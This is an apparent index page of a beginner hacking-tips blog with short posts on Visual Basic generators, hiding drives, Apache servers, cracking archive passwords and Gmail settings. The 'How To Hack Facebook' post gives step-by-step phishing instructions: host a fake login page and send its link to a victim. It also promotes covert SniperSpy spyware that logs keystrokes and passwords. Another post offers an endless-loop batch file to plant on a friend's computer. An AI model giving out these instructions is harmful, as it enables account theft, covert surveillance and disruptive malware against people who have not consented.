0 How To Create A Simple Key Generator In Visual Basic 2010 FOR BEGINNERS


Microsoft Visual Basic 2010 is a very powerful tool that allows you to quickly and easily set up the design of a program and just as easily allows you to code your program. It has been used to make anything from simple text editors to advanced and powerful operating systems. Today I am going to show you how to create a Password, PIN, and Key generator that should look something like this when we are done. I will also teach you how to customize it and make it your own.

Before we start I would like to explain this will not help you crack, hack, or attack accounts, personal information, or programs. It simply will give you a randomly generated password, PIN, or serial key.
*If you already have Visual Basic skip to Starting your Generator
Downloading and Installing Visual Basic 2010
1)Follow this link to Microsoft Visual Basic 2010 Express Download: http://www.microsoft.com/visualstudio/en-us/products/2010-editions/visual-basic-express
*English speakers click this button:

*Non-English Speakers go here:

2)Click install now and let the download run. You will be asked to allow it to make changes to your computer. Make sure you click yes.
*It is 100% safe see here:

3)Once the download is complete, complete the installation process and you are ready to go.
Starting your Generator
Now that our installation is complete we are going to start our generator. First you need to open up visual basic and create a new Windows Forms Application. To do this go to File>New>Windows Forms Application. Usually when you start a visual basic project I suggest getting the style and look of your project done first. That is what we are going to do here.
First, we will create our text boxes and labels that will show the generated code. We will create 1 big text box for Passwords, 1 big text box for PINS, and 6 small text boxes for Keys. Text boxes are located in the tool box under Common Controls right here:

Labels are located in the toolbox also under Common Controls right here:

You can insert these textboxes and labels where ever you’d like and you can resize and format your page however you like. When you are done your page should look something like this:

Please take note the room I left at the top for things like Logos or anything extra you’d like to add and the room I left at the bottom for all your buttons.
Ok so now that our textboxes and labels are all in place we are going to add buttons that, when clicked, will generate the different codes. Buttons are located in the tool box under Common Controls right here:
In my generator I had several buttons. However to keep this tutorial simple we are only going to have 3. These 3 buttons will say “Generate Password”, “Generate PINS”, and “Generate Keys”. You can add however many you like but if you are following along with the tutorial your buttons should look something like this

Now that all your simple necessary display setups are done, it’s time to add some style to this. I am going to add my BMC Generator picture made with Photoshop, and I am going to change the background to red. To add a banner logo to your picture first you must go to Common Controls and find Picture Box. You can easily control the size of the picture box and the picture you want in it. Simply use the properties tab in the bottom right corner of your VB Document. Now to change the background color, click on the outside of your form and go to properties. There you will find a background color tab. There you can change it to whatever you want. Mine now looks like this:

There you go! You are all done with creating the basic visual part of your generator! Now it’s time to code it!
Coding the Buttons
To make our generator work we are going to need to code 3 different functions. 1 for passwords, 1 for pins, and 1 for keys. This is because each one contains different material. To see the coding of your VB project double click on any button and the form will pop up. Now let’s create our passwords function using this code:
*Note this goes right underneath Public Class. It cannot go in a private sub.
Public Function GeneratePasswordCode() As Object
Dim intRnd As Object
Dim intStep As Object
Dim strName As Object
Dim intNameLength As Object
Dim intLenght As Object
Dim strInputString As Object
strInputString = “1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”
intLenght = Len(strInputString)
intNameLength = 10
Randomize()
strName = “”
For intStep = 1 To intNameLength
intRnd = Int((intLenght * Rnd()) + 1)
strName = strName & Mid(strInputString, intRnd, 1)
Next
GeneratePasswordCode = strName
End Function
In this function there are 3 crucial things you should pay attention to. They are, the name of the function (GeneratePasswordCode( ) ), strInputString, and intNameLength. The name of the function is important because we are going to use it to call the function later in our coding. strInputString displays all the characters we are going to use to make the random password, and the intNameLength sets how many characters long it is going to be. You can customize these functions by simply changing them around and playing around with them!
To create our pin generator function we are going to do the same thing except we are going to change the function name to GeneratePINcode( ), make the strInputString=”1234567890”, and we are going to make the input length at 4. You can make it however long you want but typically pins are 4. Your code should now look like:
Public Function GeneratePINSCode() As Object
Dim intRnd As Object
Dim intStep As Object
Dim strName As Object
Dim intNameLength As Object
Dim intLenght As Object
Dim strInputString As Object
strInputString = “1234567890″
intLenght = Len(strInputString)
intNameLength = 4
Randomize()
strName = “”
For intStep = 1 To intNameLength
intRnd = Int((intLenght * Rnd()) + 1)
strName = strName & Mid(strInputString, intRnd, 1)
Next
GeneratePINSCode = strName
End Function
Now let’s create our Keys function. Do the same as you did with the PINS, but add the alphabet in all caps to strInputString and make the intNameLength=6. The reason we are making it equal 6 is because we are using 6 different text boxes, so if we put it as 25 it will put 25 digits in each individual text box. Your code should now look like:
Public Function GenerateKeysCode() As Object
Dim intRnd As Object
Dim intStep As Object
Dim strName As Object
Dim intNameLength As Object
Dim intLenght As Object
Dim strInputString As Object
strInputString = “1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ”
intLenght = Len(strInputString)
intNameLength = 6
Randomize()
strName = “”
For intStep = 1 To intNameLength
intRnd = Int((intLenght * Rnd()) + 1)
strName = strName & Mid(strInputString, intRnd, 1)
Next
GenerateKeysCode = strName
End Function
Now all your functions are ready to go. It’s time we put them to use! First we are going to create a click event. This means that when a user clicks something happens. To do this double click Generate Passwords. You have just created your first click event. Now in between Private Sub and End Sub put:
Textbox#.text=GeneratePasswordCode( )
This is calling our function to the textbox we are using and making it generate a random code. Make sure you put the textbox number where I put the # symbol or else nothing will happen.
You can do the same exact thing for pins except it will be:
Textbox#.text=GeneratePINSCode()
It’s the same thing just a different name.
Now for Keys it’s a little more work because we have 6 different textboxes so your code will look more like:
Textbox#.text=GenerateKeysCode()
Textbox#.text=GenerateKeysCode()
Textbox#.text=GenerateKeysCode()
Textbox#.text=GenerateKeysCode()
Textbox#.text=GenerateKeysCode()
Textbox#.text=GenerateKeysCode()
It’s the same thing just 6 times!
Now your program is finished! Run and Debug the program to make sure there are no errors! Then go to Build>Publish and complete the process. Then you should get an icon on your desktop called setup.exe. Run that and install your application and pass it on to all your friends!
Read More...

0 How To Hide Any Drive Through GPEDIT

Till now we have learn how to hide any drive from explorer in two ways -
  1. Hide your drives in explorer with command prompt
  2. Hide your drives in explorer with regedit
Now its turn for moving on to another level, lets suppose a virus or your administrator has blocked both command prompt and regedit but you still want to hide your drive, in that case Group Policy Editor will come in play.

Here is how to do it:

Step 1. Open Group Policy Editor (Press Win+R and type Gpedit.msc and press Enter)

gpedit Learn Windows tweaking with Gpedit and Regedit   Part 1


Step 2. Navigate to User Configuration > Administrative Templates > Windows Component > Windows Explorer
Step 3. Now on the right Hand side i.e Settings Pane look for Hide these specified drives in My Computer.
Step 4. Double Click on it and Enable it, now choose from the drop down box which drive you want to hide (I choose All – Restrict All Drives)

Hard drive


Step 5. Now click on Apply and click OK, now you can see that Hide these specified drives in My Computer is Enabled.

enabled gpedit
Step 6. Now logoff and login back to see changes.

How to revert back -
In order to get them back go to Gpedit and set the Hide these specified drives in My Computer setting to Disable. That’s it.
Read More...

0 How To Make Harmless Virus That Open The Notepad File Continuously


This is step by step tutorial that explains how to make harmless virus that open the notepad file continuously.This is non-destructive virus to your computer system. If you want to have some fun with your friends , drop this cool harmless virus into his pc.
.1) Launch Notepad
2) Type this code into notepad
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


3) save as filename.bat for example notepad.bat
Read More...

0 Google gravity

Guys .. Have you ever heard about GOOGLE GRAVITY. It is interesting ,want to try out,steps are given below:

1. Open Google search engine.
2. Search for GOOGLE GRAVITY.
3. Click on first link.
4. wait for at least 5 seconds.
5. well, enjoy gravity effect and after that write anything in searching space and press Enter.
Read More...

0 How To Hack Facebook.......

Wanna to learn how to hack facebook. This is complete step by step tutorial that explains how to hack facebook with fake login page, how to hack facebook with sniper spy and how to hack facebook to view private pictures
.
1) How To Hack Facebook – Phishing
Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages. So , we’ll create login page taht resemble the original facebook login page. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away.



Step 1
Download fake facebook login page from this link . Upload all downloaded files to web hosting that supports php language, . I recommend 000webhost.com , it’s free and has all what you need.



Step 2
Login to your web hosting and upload files to root folder (root folder in 000webhost is /public_html), if you want to upload it to other folder then you’ll need to change facebook.htm code , action=”/login.php” , replace with action=”/yourFolder/login.php”. Below are instructions how to upload files to 000webhost.com , for other web hosting services is similar. Launch Cpanel , go to File Manager and upload.




Step 3
Select FacebookPasswords.htm and Pass.php and click on Chmod. Set the permissions to 777



That is it. Send url of the fake facebook login page to the person you want to hack .

2) How To Hack Facebook – Sniper Spy (Remote Install Supported)
SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access! Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel! This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!



SniperSpy Features:
1. SniperSpy is remotely-deployable spy software
2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!
3. Logs All Keystrokes


4. Records any Password (Email, Login, Instant Messenger etc.)



5. Remote Monitor Entire IM Conversations so that you can spy on IM activities too
6. Captures a full-size jpg picture of the active window however often you wish
7. Real Time Screen Viewer
8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user
9. Completely Bypasses any Firewall
What if i dont have physical acess to victims computer?



No physical access to your remote PC is needed to install the spy software. Once installed you can view the screen LIVE and browse the file system from anywhere anytime. You can also view chats, websites, keystrokes in any language and more, with screenshots.
This software remotely installs to your computer through email. Unlike the other remote spy titles on the market, SniperSpy is fully and completely compatible with any firewall including Windows XP, Windows Vista and add-on firewalls.
The program then records user activities and sends the data to your online account. You login to your account SECURELY to view logs using your own password-protected login. You can access the LIVE control panel within your secure online account.
Why would I need SniperSpy?
Do you suspect that your child or employee is inappropriately using your unreachable computer? If yes, then this software is ideal for you. If you can’t get to your computer and are worried about the Internet safety or habits of those using it, then you NEED SniperSpy.
This high-tech spy software will allow you to see exactly what your teenager is doing in MySpace and elsewhere in real time. It will also allow you to monitor any employee who uses the company computer(s).


DOWNLAOD SNIPER SPY


3) How To Hack Facebook – View Private Pictures
This hack will enable you to view private pictures in facebook by adding a link above photos to see them in their albums, even if you’re not their friend. We’ll be using Greasemonkey script for firefox.



This hack will add a link above such photos with a link saying “See this Photo in its Album”. Clicking this link will reload the photo, but you’ll be viewing it inside the album that you couldn’t view without this hack.
When you’re viewing a photo that is in an album like this, the script (Greasemonkey script) will now add a link above the photo that says “Back to Album”. This will remove the photo from the page and load a thumbnail gallery of all photos in the album.
When viewing all photos of a user, on the page that shows photos of them and their albums etc., a link is added at the top to view all photos of them on one page.
This script however cannot get around Facebook’s security, so you will not be able to view photos that you can’t otherwise view.
Before I teach you how to apply this hack, I’ll be assuming that you are using Firefox Browser and have Greasemonkey script addon installed on it.
Click here to download Greasemonkey Script addon for firefox.
After you are done installing Greasemonkey Script, restart your firefox.
Now download the following script by clicking on the link below:

DOWNLOAD SCRIPT

When you click the link above, you’ll be welcomed to the screen similar this:



Click on Install, restart firefox if needed. Now the script you applied will be working forever.
If you have any problem with this hack you can comment us or go to the discussion board of this script.
Read More...

0 Home HTTP Server – How to create one



            In this tutorial we will see how to create an HTTP server. A web server is software installed on a computer that allows other computers to access specific files on that computer/server. There are many reasons to create your own home servers.

For example: file sharing, so you can download files from your home computer from anywhere or you can create a web site on own server etc. Simply said It works like this; You choose a directory on your computer , in that directory add folders, files like music,video and etc. When you put the IP address of your computer the in web browser you can see all the files from that folder and you can download those files. Let’s now create a server(HTTP server!) using Apache(a server client):

1. You must have:
  • Broadband internet connection always on
  • Windows on your computer
2. Create a folder on your disc , in this example I created a folder on E:\my server
3. Download apache_2.2.10-win32-x86-no_ssl.msi and install it, set parameters( for localhost type something like a myserver.com(doesn’t really matter), also type your email address in field “Administrator@ Email Address” ) as shown below, choose where you want to install it.





 
Enter email address where you want to receive tutorials when we post them! It’s free!

4..When you install Apache , go to directory where you installed it (p.e. “C:\Program Files\Apache Software Foundation\Apache2.2\conf”) , here you will find a httpd file.
Open that file with notepad.




After this will appear notepad with long and complicated code, don´t worry, you must change just 3 things.

5. In notepad file find #DocumentRoot “C:/Program Files/Apache Group/Apache2/htdocs” and replace with #DocumentRoot “E:\my server”. Also find #<Directory  “C:/Program Files/Apache Group/Apache2/htdocs” and replace with <Directory  “E:\my server”.  E:\my server is folder where you put files which will appear on your server. In this example I created that folder on local disc E:. You can create your folder in any other place, but then type that path here. Find #AllowOverride None and change to AllowOverride All.

Change selected code




After this, save file like httpd.conf.



6. Type in web addresses http://localhost/ or your IP Address, you should see something like this




Every files you put in folder , which we created in step 2 , will be shown on http://localhost/
7. If you want access own server from other computers. You must forward a port in the router we’re using. The port we need to forward is port number 80. Why? Because by default it’s the port used for HTTP. Port forwarding actually means opening a tunnel through the router so that the router wouldn’t reject the connections that are trying to connect to it. How to port-forward? With every router it’s different. Here are the instructions for every one of them. You must also turn off you firewall.
That is all. Enjoy your home server. If you have questions, post them in the comments area.
Note: Creating home server is risky,when you open port, there is a possibility to have someone a breach in your computer .Before you start, make sure your computer has all the latest patches and security updates, and that you’ve done a thorough spyware and virus scan. This tutorial is only for advanced users
Read More...

0 How To Crack WinZip Or WinRar Password

If you ever downloaded winrar / winzip file on the computer, then you know that there’s an enormous chance that winrar or winzip file is protected with password. Also there’s an enormous chance that you’ll never find that password. In situation like this only solution is to crack winrar password.




In this post I’ll show you how to do it with Zip password Recovery Magic v6.1.1.169 .
1) Download Zip password Recovery Magic v6.1.1.169 from this link and install it
2) Launch Zip password Recovery Magic v6.1.1.169 and open winrar / winzip file that you want to crack



3)Choose attack method , there are 3 options : BruteForce , dictionary, booost – up.
Brute force actually means to start with a letter a and encrypting it. Then see if the encrypted strings match. If not then b, c, … until we’ve gotten . Then the encrypted strings will match and we’ll know that is the right password.Brute force attack is the slowest method of cracking, but there is no risk that you’ll not find the password. The thing about brute force is that the time of cracking rises rapidly depending on how long the password is, how many characters are being used in it and so forth.
A dictionary attack is a method of breaking into a password-protected computer or server by systematically entering every word in a dictionary as a password.




4) Click on Start , and wait, password will be cracked

Read More...

0 How To Create Multiple Email Addresses In Gmail

Most of us own more than one email account ,
one from Gmail, one from Hotmail …Most of us are lazy and don¨t like to log in a lot of accounts It would be cool to have one email account where you can send emails from multiple addresses. Luckily, Gmail has an option to integrate multiple email accounts into a single Gmail account. For example, let¨s say that you have two account hackspc@gmail.com and blaz65@hotmail.com. You can integrate the email blaz65@hotmail.com to hackspc@gmail.com. Here is step by step tutorial:


1) Log in to your gmail account and click on Settings at the top right corner.




2) Under Settings, click on Accounts tab and click on Add another email address you own, Next -> Send Verification



























A Verification email will be sent to the address that you specify. Once you verify that you own the email address, it will be integrated to your Gmail account.
After this, you¨ll be able to send email to to multiple addresses.


Read More...